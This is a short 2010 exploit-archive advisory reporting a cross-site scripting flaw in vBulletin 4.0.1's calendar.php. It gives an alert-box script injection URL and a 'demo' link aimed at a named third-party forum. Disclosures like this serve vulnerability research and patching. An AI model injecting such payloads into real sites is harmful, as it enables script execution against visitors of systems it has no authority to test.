Home / os / winme

vbulletin401-xss.txt

Posted on 15 February 2010

[+] Script: vBulletin™ Version 4.0.1
[+] Vendor: www.vbulletin.com
[+] Author: W4n73d
[+] Mail: w3hrm4cht@gmail.com

[~] Bug: Cross Site Scripting (XSS)
[~] Exploit: http://[HOST]/forum/calendar.php="<script>alert("! XSS
!");</script>
[~] Demo: http://www.overbr.com.br/forum/calendar.php="<script>alert("! XSS
!");</script>

[+] Date: 12/02/2010

 

TOP